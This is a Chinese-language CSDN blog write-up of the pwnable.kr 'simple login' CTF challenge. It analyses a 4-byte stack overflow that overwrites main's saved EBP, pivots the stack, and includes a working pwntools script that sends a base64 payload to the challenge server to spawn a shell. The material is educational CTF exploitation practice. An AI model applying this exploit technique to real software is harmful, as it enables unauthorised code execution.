pwnable 笔记 Rookiss - simple login - 50 pt

最新推荐文章于 2018-09-26 20:21:44 发布
最新推荐文章于 2018-09-26 20:21:44 发布
阅读量1.9k 收藏 2
点赞数 3
分类专栏: pwn 知识总结 pwnable.kr 题解 文章标签: pwn 栈溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/smalosnail/article/details/53694418
版权
pwn 同时被 3 个专栏收录
35 篇文章 2 订阅
订阅专栏
pwnable.kr 题解
20 篇文章 18 订阅
订阅专栏
知识总结
14 篇文章 0 订阅
订阅专栏

题目分析

附件下载下来看大小有差不过有1MB,应该是静态链接的程序,送到IDA Pro中查看,果然,函数多的不能自已,主函数的结构也很复杂:
func
还好没有strip,main函数200+行,勉强能分析下来
main
程序的流程如下:

  1. 输入Authenticate,Base64Decode后送至auth()

  2. auth()生成其MD5值并与f87cd601aa7fedca99018a8be88eda34

  3. 若相等则调用correct(),给shell

这里有一个输入长度的判断,如下图:
len

decode后的字符串长度要小于12,这里不妨生成一个长度12的字符串输入进去试试:

ipython

overflow

发现溢出,下面用GDB调试,定位溢出点:
GDB

可以发现0x43434343(CCCC)覆盖了main()EBP,当执行到leave指令时出错了

leave相当于以下两条汇编指令:

指令含义
MOV ESP, EBPEBP的值赋给ESP,即将栈指针移动至栈底部
POP EBP弹出保存在栈顶的前一个函数的EBP,即恢复栈桢

这里由于出现溢出,main函数保存在栈中的EBPCCCC覆盖

MOV ESP, EBP指令会把ESP的值赋为0x43434343,而这个地址是不合法的,显然不能作为栈的地址,因此会报错

这个溢出的利用方法简单,把main函数的EBP覆写为一个可以访问的我们可以控制的值即可

解题思路

构造字符串,将main()函数EBP覆写为我们输入的字符串的起点:

input:junk codeRETEBP of main
0811EB40:0xdeadbeefsystem(“/bin/sh”)addr of input

system("/bin/sh")地址如下:
system

解题过程

  • 控制EBP

    溢出可导致EBP被覆写

  • 控制ESP

    MOV ESP, EBP 使ESP也可控

  • 控制EIP

    POP EBP 将input前4字节弹出栈
    RET 相当于 POP EIP
    input的中间4字节会覆写EIP

解题脚本

#!/usr/bin/python
from pwn import *

# context.log_level = 'debug'
# p = process('./login')
p = remote('pwnable.kr',9003)

congz = 0x08049278
input = 0x0811EB40
payload = (p32(0xdeadbeef) + p32(congz) + p32(input)).encode('base64')

p.recvuntil('Authenticate : ')
# gdb.attach(p,'b *0x804930b') # breakpoint at leave
p.sendline(payload)

p.interactive()

More

OK

正如Flag所言,漏洞的利用其实就是一个逐步渗透的过程。

TaQini852
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HCIA - 80期笔记 HCIA - 80期笔记
01-07
HCIA - 80期笔记
pwnable.kr之simple login详解
Bill
04-26 2093
学习二进制不容易,大家要忍得住寂寞,耐得住孤独,进入正题. 总体思路: 输入更多的数据,溢出,修改main的返回值地址,使其返回到correct中,从而获取shell. 大家可能会有疑问:为什么不修改auth函数的返回值地址,跳到correct中.这是因为长度不够,我们需要输入16个字节的长度,才能覆盖返回值地址,但是程序只给了我们12个字节的长度. main函数int main(int
pwnable.kr之simple login
Jason_ZhouYetao的博客
07-14 582
这题与之前所作的题目不同,不同点在于这题不存在ssh连接至其他的服务器,需要自己在脚本中体现。 首先,下载文件,放到IDA里跑一跑(这里说明,要注意下载下来的文件是32位还是64位的文件,这关系到能不能正确打开并得到反汇编代码的问题),得到main函数的伪代码: int __cdecl main(int argc, const char **argv, const char **envp) ...
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3072
终于打到第二关了... 这题考察GOT覆写
pwnable brain fuck(bss段的用途)
九层台
09-26 645
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
pwnable.kr [Rookiss] - [simple login]
Re:Umiade.tr
03-23 1345
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 Rookiss 初体验就从相对熟悉的逆向这一块开始好了。下载好文件后发现是 elf 64 ,在虚拟机上简单跑一跑,要求输入一个 Authenticat
c++笔记9-引用.pdf
11-16
c++笔记9-引用.pdf
Cadence学习笔记1-原理图.pdf
11-16
Cadence学习笔记1-原理图.pdf
安卓第六天笔记--ListView
02-26
所有使用ArrayAdapterArrayAdapter是ListAdapter的子类布局文件Activityandroid.R.layout.simple_list_item_1内部就是一个TextViewcontext:上下文LIst<?extendsMap<String>>data:集合类型的对象,每个元素都是一个...
pwnable.kr simple login writeup
lxx_nico的专栏
09-17 1217
pwnable.kr simple login writeup虽然说是pt150但是还是让我学到很多东西的。这是一个判定特定字符串的程序,直接说溢出点吧。输入的字符会经过一个base64解码,溢出点在auth的memcpy,只能够有4个字节的溢出,这么少怎么弄? 参考了大神思路。http://www.cnblogs.com/anewid/p/4567242.html 我们只能溢出4个字
pwnable.kr login之write up
weixin_34032779的博客
11-14 67
main函数如下: auth函数如下: 程序的流程如下: 输入Authenticate值,并base64解码,将解码的值代入md5_auth函数中 mad5_auth()生成其MD5值并与f87cd601aa7fedca99018a8be88eda34相比,如果相等则调用correct函数,得到shell ...
RCTF - Exploitation 200 welpwn - writeup
HiTaQini
12-02 2899
RCTF 2015 welpwn 200 linux 64位 栈溢出 ROP + leak libc
pwnable 笔记 Rookiss - fsb - 20 pt
HiTaQini
12-17 3136
典型的格式化字符串漏洞
Example for Simple Login
Derek_Zhang_的专栏
03-27 701
1. Open chrome and its developer tool 2. Conduct the login operation in chrome, record the network intercourse. 3. Analyze the HTTP Request and HTTP Response Request Headers POST /member/xlogin.ph
PWN学习之[Rookiss]-[simple login]
Magic1an的博客
08-19 747
文件下载下来后是个elf可执行文件 用IDA反编译后可以看到溢出点在auth函数中_BOOL4 __cdecl auth(int a1) { char v2; // [sp+14h] [bp-14h]@1 char *s2; // [sp+1Ch] [bp-Ch]@1 int v4; // [sp+20h] [bp-8h]@1 memcpy(&v4, &input, a1); s
pwnable 笔记 Toddler's Bottle - random
HiTaQini
11-04 867
random源码: 伪随机数random的值不会变,找到random的值与0xdeadbeef异或即可得到key rand = 0x6b8b4567 ans = 0xdeadbeef key = rand ^ ans #key = 3039230856
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1720
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
pwnable.kr simple login
you_need_me的博客
06-02 261
点击打开链接
pwnable.kr brainfuck writeup
jmp esp
03-28 1753
题目I made a simple brain-fuck language emulation program written in C. The [ ] commands are not implemented yet. However the rest functionality seems working fine. Find a bug and exploit it to get a
数通认证HCIP-Datacom笔记
最新发布
04-16
本资源是一份针对华为HCIP-Datacom方向的认证笔记,重点讨论了OSPF(Open Shortest Path First)的基础概念及其在网络路由中的应用。OSPF是一种内部网关协议,它在路由器的控制平面(RIB,Routing Information Base...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值